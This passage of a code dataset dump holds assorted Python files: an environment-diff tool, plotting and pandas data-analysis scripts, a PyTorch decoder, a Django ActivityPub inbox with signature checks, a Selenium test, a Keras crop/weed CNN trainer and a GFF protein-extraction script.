Since the content of {command} in after_script\n # is likely something like 'source some_file' and 'some_file' may source\n # any number of files and so on, one of which may have a syntax error, it\n # is makes a big difference to use the above call to subprocess.run()\n # instead of the two below ones\n #\n # result = subprocess.run(after_script, shell=True, ...)\n # result = subprocess.run([\"/bin/sh\", \"-c\", after_script], ...)\n if result.returncode != 0:\n print(f\"{sys.argv[0]} : \\033[33mWARNING\\033[0m: command returned non-zero exit code {result.returncode}\")\n\n if result.stdout.strip() == \"\":\n print(f'{sys.argv[0]}: \\033[1;31mERROR\\033[0m: Command failed, could not get environment after command')\n return None\n\n env_after = envtool.EnvWrapper.from_environment_dict(json.loads(result.stdout))\n\n return {\n 'before': env_before,\n 'after': env_after\n }\n\n\ndef diff_command(args):\n envs = env_diff(' '.join(args.posargs))\n if envs is None:\n return\n if args.shell:\n print(get_effect(envs['before'], envs['after']))\n elif args.executables:\n path_diff(envs['before']['PATH'], envs['after']['PATH'])\n else:\n print(compare_envs(envs['before'], envs['after']))\n","sub_path":"libexec/env-tools/envdiff.py","file_name":"envdiff.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511577958","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 2 11:38:47 2021\n\n@author: oislen\n\"\"\"\n\n# load relevant libraries\nfrom matplotlib import pyplot as plt\n\ndef plot_errors(errors_index,\n img_errors,\n pred_labels, \n obs_labels,\n nrows = 2,\n ncols = 3\n ):\n \n \"\"\" \n \n Plot Errors Documention\n \n Function Overview\n \n This function plots images with their predicted and real labels.\n \n Defaults\n \n plot_errors(errors_index,\n img_errors,\n pred_labels, \n obs_labels,\n nrows = 2,\n ncols = 3\n )\n \n Parameters\n \n errors_index - np.array, the image indices to plot \n img_errors - np.array, the image pixels \n pred_labels - np.array, the predicted labels\n obs_labels - np.array, the observed labels\n \n Returns\n \n 0 for successful execution\n \n Source \n \n https://www.kaggle.com/yassineghouzam/introduction-to-cnn-keras-0-997-top-6\n \n \"\"\"\n \n # set plot index\n idx = 0\n \n # create subplot canvas\n fig, ax = plt.subplots(nrows = nrows,\n ncols = ncols,\n sharex = True,\n sharey = True\n )\n \n # loop through rows\n for row in range(nrows):\n \n # loop through columns\n for col in range(ncols):\n \n # extract out error\n error = errors_index[idx]\n \n # plot image\n ax[row,col].imshow(img_errors[error][:, :, 0])\n \n # extract out error info\n pred_error = pred_labels[error]\n obs_error = obs_labels[error]\n \n # create error label\n err_label = \"Predicted label :{}\\nTrue label :{}\".format(pred_error, obs_error)\n \n # assign error label to plot\n ax[row,col].set_title(err_label)\n \n # increment plot index\n idx += 1\n \n return 0","sub_path":"competitions/Digit_Recognizer/scripts/graph/plot_errors.py","file_name":"plot_errors.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324659038","text":"# 1\n\nimport pandas as pd\n\ndata = pd.read_csv(r'539_m6_datasets_v1.0\\Salaries.csv',delimiter=',')\n\ngrp = data.groupby('Year')\n\ntotalpay1 = sum(grp.get_group(2011)['TotalPayBenefits'])\ntotalpay2 = 
sum(grp.get_group(2014)['TotalPayBenefits'])\n\nprint('Total salary cost has increased by',totalpay2-totalpay1 ,'from year 2011 to 2014')\n\n# 2\n\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmax(h.items(),key=operator.itemgetter(1))[0]\nmax(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Title in Year 2014 having highest mean salary of',max(h.items(),key=operator.itemgetter(1))[1] ,'is',max(h.items(),key=operator.itemgetter(1))[0])\n\n# 3\n\ngrp = data.groupby('Year')\n\ngrp.get_group(2014).sum()['OvertimePay']\n\nprint('Money that could have been saved in Year 2014 by stopping OverTimePay is',grp.get_group(2014).sum()['OvertimePay'])\n\n# 4\n\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\n\ndata_sorted = means.sort_values(by='TotalPayBenefits',ascending=False)\n\ntop_5 = data_sorted.iloc[:5,6]\n\nh = dict(top_5)\n\nprint('Top 5 common job in Year 2014 and how much do they cost SFO is as follows')\ni=1\nfor key,value in h.items():\n    print(i,'.',key,':',value)\n    i+=1\n\n# 5\n\ngrp = (data.groupby(['Year','JobTitle']))\nmeans = grp.sum()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmax(h.items(),key=operator.itemgetter(1))[0]\nmax(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Top earning employee across all years',max(h.items(),key=operator.itemgetter(1))[0][0],'is',max(h.items(),key=operator.itemgetter(1))[0][1],'and the total salary is',max(h.items(),key=operator.itemgetter(1))[1])\n\n# Enhancements for code\n\n# 1\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\n\ndata_sorted = means.sort_values(by='TotalPayBenefits',ascending=True)\n\nbot_5 = data_sorted.iloc[:5,6]\n\nh = dict(bot_5)\n\nprint('Last 5 common job in Year 2014 and how much do they cost SFO is as follows')\ni=1\nfor key,value in h.items():\n    print(i,'.',key,':',value)\n    i+=1\n\n# 2\ngrp = data.groupby('Year')\n\ntotal_overtime = sum(grp.get_group(2011)['OvertimePay'])\ntotal_pay = sum(grp.get_group(2011)['TotalPayBenefits'])\n\nprint('OverTimePay is',(total_overtime/total_pay)*100,'percent of TotalPayBenefits')\n\n# 3\ngrp1 = data[data.Year==2014].groupby(['JobTitle'])\n\nmeans = grp1.mean()\nh=dict(means['TotalPayBenefits'])\n\nimport operator\n\nmin(h.items(),key=operator.itemgetter(1))[0]\nmin(h.items(),key=operator.itemgetter(1))[1]\n\nprint('Title in Year 2014 having lowest mean salary of',min(h.items(),key=operator.itemgetter(1))[1] ,'is',min(h.items(),key=operator.itemgetter(1))[0])\n \n","sub_path":"Module6_b.py","file_name":"Module6_b.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"290177606","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom kospeech.models.modules import BaseRNN\nfrom kospeech.models.attention import MultiHeadAttention\nfrom torch import Tensor\n\n\nclass SpellingCorrectorDecoder(nn.Module):\n    def __init__(\n            self,\n            num_classes: int,          # number of classification classes\n            max_length: int = 120,     # a maximum allowed length for the sequence to be processed\n            hidden_dim: int = 1024,    # dimension of RNN`s hidden state vector\n            sos_id: int = 1,           # start of sentence token`s id\n            eos_id: int = 2,           # end of sentence token`s id\n            num_heads: int = 4,        # number of attention heads\n            num_layers: int = 3,       # number of RNN layers\n            rnn_type: str = 'lstm',    # type of RNN cell\n            dropout_p: float = 0.3,    # dropout probability\n            device: str = 'cuda'       # device - 'cuda' or 'cpu'\n    ) -> None:\n        super(SpellingCorrectorDecoder, self).__init__()\n        self.num_classes = num_classes\n        self.num_heads = num_heads\n        self.max_length = max_length\n        self.eos_id = eos_id\n        self.sos_id = sos_id\n        self.embedding = nn.Embedding(num_classes, hidden_dim)\n        self.input_dropout = nn.Dropout(dropout_p)\n\n        self.layers = nn.ModuleList([\n            SpellingCorrectorDecoderLayer(\n                hidden_dim=hidden_dim,\n                rnn_type=rnn_type,\n                dropout_p=dropout_p,\n                device=device\n            ) for _ in range(num_layers)\n        ])\n\n        self.attention = MultiHeadAttention(hidden_dim)\n\n    def forward(self, inputs: Tensor, encoder_outputs: Tensor) -> Tensor:\n        inputs = self.embedding(inputs)\n        # apply the input dropout defined above; there is no top-level RNN,\n        # the recurrence lives inside the stacked decoder layers\n        output = self.input_dropout(inputs)\n\n        context, attn = self.attention(output, encoder_outputs, encoder_outputs)\n\n        for layer in self.layers:\n            output = layer(output, context)\n\n        output = F.log_softmax(output, dim=-1)\n        output += F.log_softmax(context, dim=-1)\n\n        return output\n\n\nclass SpellingCorrectorDecoderLayer(BaseRNN):\n    def __init__(self, hidden_dim, rnn_type, dropout_p, device):\n        super(SpellingCorrectorDecoderLayer, self).__init__(\n            input_size=hidden_dim << 1,\n            hidden_dim=hidden_dim,\n            num_layers=1,\n            rnn_type=rnn_type,\n            dropout_p=dropout_p,\n            bidirectional=False,\n            device=device\n        )\n        self.dropout = nn.Dropout(p=dropout_p)\n\n    def forward(self, query, context):\n        residual = query\n        output = torch.cat((query, context), dim=2)\n\n        output, _ = self.rnn(output)\n        output = self.dropout(output)\n\n        return output + residual\n","sub_path":"kospeech/models/spelling_corrector/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"339831143","text":"######################################################\n# File name: list-modify.py\n######################################################\n\ndef main():\n    # create a list\n    buah = [\"durian\", \"mangga\", \"apel\"]\n    print(\"Before modification:\")\n    print(buah)\n\n    # modify list elements\n    buah[1] = \"salak\"\n    buah[-1] = \"pepaya\"\n\n    # show the result of the modification\n    print(\"\\nAfter modification:\")\n    print(buah)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bab/bab-2/list-modify.py","file_name":"list-modify.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"400027586","text":"''' handles all of the activity coming in to the server '''\nfrom base64 import b64decode\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nfrom django.http import HttpResponse, HttpResponseBadRequest, \\\n        HttpResponseNotFound, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport django.db.utils\nimport json\nimport requests\n\nfrom fedireads import activitypub\nfrom fedireads import models\nfrom fedireads import outgoing\nfrom fedireads.status import create_review, create_status, create_tag\nfrom fedireads.remote_user import get_or_create_remote_user\n\n\n@csrf_exempt\ndef shared_inbox(request):\n    ''' incoming activitypub events '''\n    # TODO: should this be functionally different from the non-shared inbox??\n    if request.method == 'GET':\n        return HttpResponseNotFound()\n\n    try:\n        activity = json.loads(request.body)\n    except json.decoder.JSONDecodeError:\n        return HttpResponseBadRequest()\n\n    try:\n        verify_signature(request)\n    except ValueError:\n        return HttpResponse(status=401)\n\n    
response = HttpResponseNotFound()\n if activity['type'] == 'Follow':\n response = handle_incoming_follow(activity)\n\n elif activity['type'] == 'Undo':\n response = handle_incoming_undo(activity)\n\n elif activity['type'] == 'Create':\n response = handle_incoming_create(activity)\n\n elif activity['type'] == 'Accept':\n response = handle_incoming_follow_accept(activity)\n\n elif activity['type'] == 'Like':\n response = handle_incoming_favorite(activity)\n\n elif activity['type'] == 'Add':\n response = handle_incoming_add(activity)\n\n # TODO: Add, Undo, Remove, etc\n\n return response\n\n\ndef verify_signature(request):\n ''' verify rsa signature '''\n signature_dict = {}\n for pair in request.headers['Signature'].split(','):\n k, v = pair.split('=', 1)\n v = v.replace('\"', '')\n signature_dict[k] = v\n\n try:\n key_id = signature_dict['keyId']\n headers = signature_dict['headers']\n signature = b64decode(signature_dict['signature'])\n except KeyError:\n raise ValueError('Invalid auth header')\n\n response = requests.get(\n key_id,\n headers={'Accept': 'application/activity+json'}\n )\n if not response.ok:\n raise ValueError('Could not load public key')\n\n actor = response.json()\n key = RSA.import_key(actor['publicKey']['publicKeyPem'])\n\n comparison_string = []\n for signed_header_name in headers.split(' '):\n if signed_header_name == '(request-target)':\n comparison_string.append('(request-target): post %s' % request.path)\n else:\n comparison_string.append('%s: %s' % (\n signed_header_name,\n request.headers[signed_header_name]\n ))\n comparison_string = '\\n'.join(comparison_string)\n\n signer = pkcs1_15.new(key)\n digest = SHA256.new()\n digest.update(comparison_string.encode())\n\n # raises a ValueError if it fails\n signer.verify(digest, signature)\n\n return True\n\n\n@csrf_exempt\ndef inbox(request, username):\n ''' incoming activitypub events '''\n # TODO: should do some kind of checking if the user accepts\n # this action from the sender probably? 
idk\n # but this will just throw a 404 if the user doesn't exist\n try:\n models.User.objects.get(localname=username)\n except models.User.DoesNotExist:\n return HttpResponseNotFound()\n\n return shared_inbox(request)\n\n\n@csrf_exempt\ndef get_actor(request, username):\n ''' return an activitypub actor object '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n try:\n user = models.User.objects.get(localname=username)\n except models.User.DoesNotExist:\n return HttpResponseNotFound()\n return JsonResponse(activitypub.get_actor(user))\n\n\n@csrf_exempt\ndef get_status(request, username, status_id):\n ''' return activity json for a specific status '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n try:\n user = models.User.objects.get(localname=username)\n status = models.Status.objects.get(id=status_id)\n except ValueError:\n return HttpResponseNotFound()\n\n if user != status.user:\n return HttpResponseNotFound()\n\n return JsonResponse(activitypub.get_status(status))\n\n\n@csrf_exempt\ndef get_replies(request, username, status_id):\n ''' ordered collection of replies to a status '''\n # TODO: this isn't a full implmentation\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n status = models.Status.objects.get(id=status_id)\n if status.user.localname != username:\n return HttpResponseNotFound()\n\n replies = models.Status.objects.filter(\n reply_parent=status\n ).first()\n\n replies_activity = activitypub.get_replies(status, [replies])\n return JsonResponse(replies_activity)\n\n\n@csrf_exempt\ndef get_followers(request, username):\n ''' return a list of followers for an actor '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n user = models.User.objects.get(localname=username)\n followers = user.followers\n page = request.GET.get('page')\n return JsonResponse(activitypub.get_followers(user, page, followers))\n\n\n@csrf_exempt\ndef get_following(request, username):\n ''' return a list of following for an actor '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n user = models.User.objects.get(localname=username)\n following = models.User.objects.filter(followers=user)\n page = request.GET.get('page')\n return JsonResponse(activitypub.get_following(user, page, following))\n\n\ndef handle_incoming_follow(activity):\n ''' someone wants to follow a local user '''\n # figure out who they want to follow\n to_follow = models.User.objects.get(actor=activity['object'])\n # figure out who they are\n user = get_or_create_remote_user(activity['actor'])\n # TODO: allow users to manually approve requests\n try:\n models.UserRelationship.objects.create(\n user_subject=to_follow,\n user_object=user,\n status='follow_request',\n relationship_id=activity['id']\n )\n except django.db.utils.IntegrityError:\n # Duplicate follow request. Not sure what the correct behaviour is, but\n # just dropping it works for now. 
We should perhaps generate the\n        # Accept, but then do we need to match the activity id?\n        return HttpResponse()\n\n    outgoing.handle_outgoing_accept(user, to_follow, activity)\n    return HttpResponse()\n\n\ndef handle_incoming_undo(activity):\n    ''' unfollow a local user '''\n    obj = activity['object']\n    if not obj['type'] == 'Follow':\n        # idk how to undo other things\n        return HttpResponseNotFound()\n    try:\n        requester = get_or_create_remote_user(obj['actor'])\n        to_unfollow = models.User.objects.get(actor=obj['object'])\n    except models.User.DoesNotExist:\n        return HttpResponseNotFound()\n\n    to_unfollow.followers.remove(requester)\n    return HttpResponse()\n\n\ndef handle_incoming_follow_accept(activity):\n    ''' hurray, someone remote accepted a follow request '''\n    # figure out who they want to follow\n    requester = models.User.objects.get(actor=activity['object']['actor'])\n    # figure out who they are\n    accepter = get_or_create_remote_user(activity['actor'])\n\n    accepter.followers.add(requester)\n    return HttpResponse()\n\n\ndef handle_incoming_create(activity):\n    ''' someone did something, good on them '''\n    user = get_or_create_remote_user(activity['actor'])\n\n    if 'object' not in activity:\n        return HttpResponseBadRequest()\n\n    # TODO: should only create notes if they are relevant to a book,\n    # so, not every single thing someone posts on mastodon\n    response = HttpResponse()\n    content = activity['object'].get('content')\n    if activity['object'].get('fedireadsType') == 'Review' and \\\n            'inReplyToBook' in activity['object']:\n        book = activity['object']['inReplyToBook']\n        book = book.split('/')[-1]\n        name = activity['object'].get('name')\n        rating = activity['object'].get('rating')\n        if user.local:\n            review_id = activity['object']['id'].split('/')[-1]\n            models.Review.objects.get(id=review_id)\n        else:\n            try:\n                create_review(user, book, name, content, rating)\n            except ValueError:\n                return HttpResponseBadRequest()\n    elif not user.local:\n        try:\n            create_status(user, content)\n        except ValueError:\n            return HttpResponseBadRequest()\n\n    return response\n\n\ndef handle_incoming_favorite(activity):\n    ''' approval of your good good post '''\n    try:\n        status_id = activity['object'].split('/')[-1]\n        status = models.Status.objects.get(id=status_id)\n        liker = get_or_create_remote_user(activity['actor'])\n    except (models.Status.DoesNotExist, models.User.DoesNotExist):\n        return HttpResponseNotFound()\n\n    if not liker.local:\n        status.favorites.add(liker)\n    return HttpResponse()\n\n\ndef handle_incoming_add(activity):\n    ''' someone is tagging or shelving a book '''\n    if activity['object']['type'] == 'Tag':\n        user = get_or_create_remote_user(activity['actor'])\n        if not user.local:\n            book = activity['target']['id'].split('/')[-1]\n            create_tag(user, book, activity['object']['name'])\n            return HttpResponse()\n        return HttpResponse()\n    return HttpResponseNotFound()\n\n\ndef handle_incoming_accept(activity):\n    ''' someone is accepting a follow request '''\n    # our local user\n    user = models.User.objects.get(actor=activity['actor'])\n    # the person our local user wants to follow, who said yes\n    followed = get_or_create_remote_user(activity['object']['actor'])\n\n    # save this relationship in the db\n    followed.followers.add(user)\n\n    return HttpResponse()\n\n","sub_path":"fedireads/incoming.py","file_name":"incoming.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"460980408","text":"# Create a Python application that uses selenium.\n# Start the selenium-py-peldatar application locally.\n# The program should load the http://localhost:9999/trickyelements.html page from the example collection.\n# Use an id locator and look up the elements one by one.\n# Click the very first element that is a button and verify that the correct text appears below the list of elements.\n\nimport time\nfrom selenium import webdriver\n\nPATH = \"/usr/bin/chromedriver\"\nURL = (\"http://localhost:9999/trickyelements.html\")\n\nbrowser = webdriver.Chrome(PATH)\nbrowser.maximize_window()\nbrowser.get(URL)\n\ntry:\n    i = 1\n    while i <= 5:\n        elem_id = browser.find_element_by_id(f'element{i}')\n\n        if elem_id.tag_name == \"button\":\n            elem_id.click()\n            result = browser.find_element_by_id(\"result\")\n            if result.text == f\"{elem_id.text} was clicked\":\n                print(\"First button:\", result.text)\n                break\n            else:\n                print(f\"element{i}: wrong text.\")\n        else:\n            print(f\"element{i}: element is not a button.\")\n        i = i + 1\n\nexcept:\n    print(\"Something went wrong\")\n\nfinally:\n    time.sleep(2)\n    browser.quit()","sub_path":"selenium-homework/elementtype.py","file_name":"elementtype.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"553264587","text":"''' \nA Convolutional Network implementation example using TensorFlow library.\nThe image database used contains pictures of crops+weeds and only crops. \nAuthor: Ananya\nBased on :\n\n'''\nfrom __future__ import print_function\nimport keras\nfrom crop_weed_utils import crop_weed_data\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras import regularizers\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nimport h5py as h5py\nimport pandas as pd\nimport keras.backend as K\nfrom pprint import pprint\nimport os\nimport pickle\nimport numpy as np\n\nbatch_size = 32\nnum_classes = 2\nepochs = 200\ndata_augmentation = False\n# num_predictions = 20\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\nmodel_name = 'keras_cropweedCNN_trained_model.h5'\n\n# The data, shuffled and split between train and test sets:\nx_train, y_train, x_test, y_test, x_val, y_val = crop_weed_data()\n# print('x_train shape:', x_train.shape)\n# print(x_train.shape[0], 'train samples')\n# print(x_test.shape[0], 'test samples')\n\n# Convert class vectors to binary class matrices.\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\ny_val = keras.utils.to_categorical(y_val, num_classes)\n\n# print(type(y_test))\n# for i in range(500,y_test.shape[0]):\n#     print(y_test[i])\n\n# print('Actual Label = '+ str(y_test[3]))\nnum_predictions = y_val.shape[0]\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_val = x_val.astype('float32')\nx_train /= 255\nx_test /= 255\nx_val /= 255\n\n# pprint(y_test.tolist())\n\nmodel = Sequential()\nmodel.add(Conv2D(20, (4, 4), padding='same',\n                 input_shape=x_train.shape[1:]))\n# model.add(Activation('relu'))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Conv2D(15, (4, 4)))\n# model.add(Activation('relu'))\n# model.add(BatchNormalization(momentum=0.99, 
epsilon=0.001))\nmodel.add(LeakyReLU(0.2))\nmodel.add(AveragePooling2D(pool_size=(4, 4)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(10, (4, 4), padding='same'))\n# model.add(Conv2D(10, (4, 4), padding='same', kernel_regularizer=regularizers.l2(0.001)))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Conv2D(10, (4, 4)))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(AveragePooling2D(pool_size=(4, 4)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# initiate RMSprop optimizer\nopt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)\n\n# Let's train the model using RMSprop\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n\n\n\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\nprint(x_val.shape[0], 'vaildation samples')\n\ncsvpath = os.path.join(\"output/cnn_crop_weed\", \"history.csv\")\nif os.path.exists(csvpath):\n print(\"Already exists: {}\".format(csvpath))\n # return\n\ncsv_logger = keras.callbacks.CSVLogger('training.log')\n\nprint('Not using data augmentation.')\nhistory=model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs, callbacks=[csv_logger],\n validation_data=(x_val, y_val),\n shuffle=True)\n\n# save history to CSV\ndf = pd.DataFrame(history.history)\ndf.to_csv(csvpath)\n\n\n'''\nif not data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True)\nelse:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n # Compute quantities required for feature-wise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(x_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(x_train, y_train,\n batch_size=batch_size),\n steps_per_epoch=x_train.shape[0] // batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test))\n'''\n# Save model and weights\nif not os.path.isdir(save_dir):\n os.makedirs(save_dir)\nmodel_path = os.path.join(save_dir, model_name)\nmodel.save(model_path)\nprint('Saved trained model at %s ' % model_path)\n\n\n# # Load label names to use in prediction results\n# label_list_path = 'datasets/cifar-10-batches-py/batches.meta'\n\n\nkeras_dir = os.path.expanduser(os.path.join('~', '.keras'))\ndatadir_base = os.path.expanduser(keras_dir)\nif not 
os.access(datadir_base, os.W_OK):\n datadir_base = os.path.join('/tmp', '.keras')\n# label_list_path = os.path.join(datadir_base, label_list_path)\n\n# with open(label_list_path, mode='rb') as f:\n# labels = pickle.load(f)\n\n# # Evaluate model with test data set and share sample prediction results\n# evaluation = model.evaluate_generator(datagen.flow(x_test, y_test,\n# batch_size=batch_size),\n# steps=x_test.shape[0] // batch_size)\n\n# Evaluate model with test data set and share sample prediction results\nevaluation = model.evaluate(x_test, y_test, batch_size=batch_size)\n\nprint('Model Accuracy = %.2f' % (evaluation[1]))\nprint(x_test.shape)\n# predict_gen = model.predict_generator(datagen.flow(x_test, y_test,\n# batch_size=batch_size),\n# steps=x_test.shape[0] // batch_size)\nprediction = model.predict(x_test, batch_size=batch_size) \n\n# for i in range(500,y_test.shape[0]):\n# print(str(y_test[i]))\n# i=1\nfor predict_index, predicted_y in enumerate(prediction):\n # actual_label = labels['label_names'][np.argmax(y_test[predict_index])]\n # predicted_label = labels['label_names'][np.argmax(predicted_y)]\n # actual_label = np.argmax(y_test[predict_index])\n # predicted_label = np.argmax(predicted_y)\n # print('Actual Label = %d vs. Predicted Label = %d' % (actual_label,\n # predicted_label))\n # print(y_test[i])\n # i=+1\n print(str(predict_index)+ 'Actual Label = '+ str(y_test[predict_index]) + 'vs. Predicted Label = ' +\n str(predicted_y))\n if predict_index == num_predictions:\n break\n\n","sub_path":"weed_crop_recogniser_CNN_forGreenImages.py","file_name":"weed_crop_recogniser_CNN_forGreenImages.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456191309","text":"import argparse\nimport os\nimport sys\nimport logging\nfrom itertools import groupby\nimport pysam\nfrom customFunctions import *\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Given a gff file, extract protein sequences based on transcript sequences'\n )\n \n parser.add_argument('gff', help='gff file input')\n parser.add_argument('transcripts', help='Fasta file of transcripts from which to fetch')\n parser.add_argument('-ts', '--trim_start', action='store_true', help='If enabled, trim the start of the protein to the nearest methionine amino acid')\n parser.add_argument(\"-l\", \"--log\", dest=\"logLevel\", default='warning', choices=['debug', 'info', 'warning', 'error', 'critical'], help='set the logging level. default = \"warning\"')\n parser.add_argument('-n', '--name', default='protein.tsv', help='Name for the file output. Default is \"protein.tsv\"')\n parser.add_argument('-o', '--outdir', default=os.getcwd(), help='Path to output to. 
Default is {}'.format(os.getcwd()))\n \n args = parser.parse_args()\n \n # Create output directory if it does not exist\n if not os.path.isdir(args.outdir):\n try:\n os.makedirs(args.outdir)\n except OSError:\n pass\n \n # Logging\n logging.basicConfig(\n filename = os.path.join(args.outdir, '{}.log'.format(os.path.basename(__file__))),\n level = getattr(logging, args.logLevel.upper()),\n filemode = 'w'\n )\n \n # Open transcripts fasta\n transcripts = pysam.FastaFile(args.transcripts)\n \n # Load gff into Pysam object\n gff = Gff.read(args.gff)\n \n # Sorting GFF is annoying in bash alone,\n # so I opt to store it in memory and then spit it back\n # out per transcript\n txts = {}\n\n with open(os.path.join(args.outdir, args.name), 'w') as o:\n for line in gff:\n if line.feature != 'CDS':\n continue\n name = line.attribute['Parent']\n if name not in txts:\n txts[name] = [line] \n else:\n txts[name].append(line)\n for txt in txts:\n logging.debug('txt: {}'.format(txt))\n txts[txt] = sorted(txts[txt], key = lambda x: x.start)\n # for x in txts[txt]:\n # logging.debug('x: {}'.format(x))\n strand = txts[txt][0].strand\n cds = txts[txt]\n if not cds:\n logging.warning('Transcript \"{}\"\" has no CDS!'.format(txt))\n continue\n seq = ('').join([transcripts.fetch(x.seqname, x.start-1, x.end) for x in cds])\n if strand == '-':\n seq = rev_comp(seq)\n aa = trans(seq)\n # Strip '-' suffix\n aa = aa.strip('-')\n # Trim sequence to nearest methionine\n if args.trim_start:\n try:\n aa = aa[aa.index('M'):]\n except ValueError:\n logging.warning(\n 'Sequence \"{}\" has no methionine. {}'.format(\n aa,\n txt\n )\n )\n logging.debug('aa: {}'.format(aa))\n o.write(\n ('\\t').join((\n cds[0].seqname,\n txt,\n aa\n )) + '\\n'\n )\n\n# with open(os.path.join(args.outdir, args.name), 'w') as o:\n# for key, group in groupby(\n# gff,\n# #key = lambda entry: dict([x.split('=') for x in entry.attributes.split(';')])['Name']\n# key = lambda entry: dict([x.split('=') for x in entry.attributes.split('; ')])['Name']\n# ):\n# logging.debug('Group key: \"{}\"'.format(key))\n# temp = [x for x in group]\n# for x in temp:\n# logging.debug('\\tx: {}'.format(x))\n# cds = [x for x in temp if x.feature == 'CDS']\n# #cds = [x for x in group if x.feature == 'CDS']\n# logging.debug('cds: {}'.format(cds))\n# strand = cds[0].strand\n# logging.debug('strand: {}'.format(strand))\n# if strand == '+':\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end) for x in cds])\n# else:\n# if len(cds) > 1:\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end)[::-1] for x in cds])\n# seq = comp(seq)\n# else:\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end) for x in cds])\n# seq = rev_comp(seq)\n# aa = trans(seq)\n# # Strip '-' suffix\n# aa = aa.strip('-')\n# logging.debug('key: {}'.format(key))\n# logging.debug('seq: {}'.format(seq))\n# # Trim sequence to nearest methionine\n# if args.trim_start:\n# try:\n# aa = aa[aa.index('M'):]\n# except ValueError:\n# logging.warning(\n# 'Sequence \"{}\" has no methionine. 
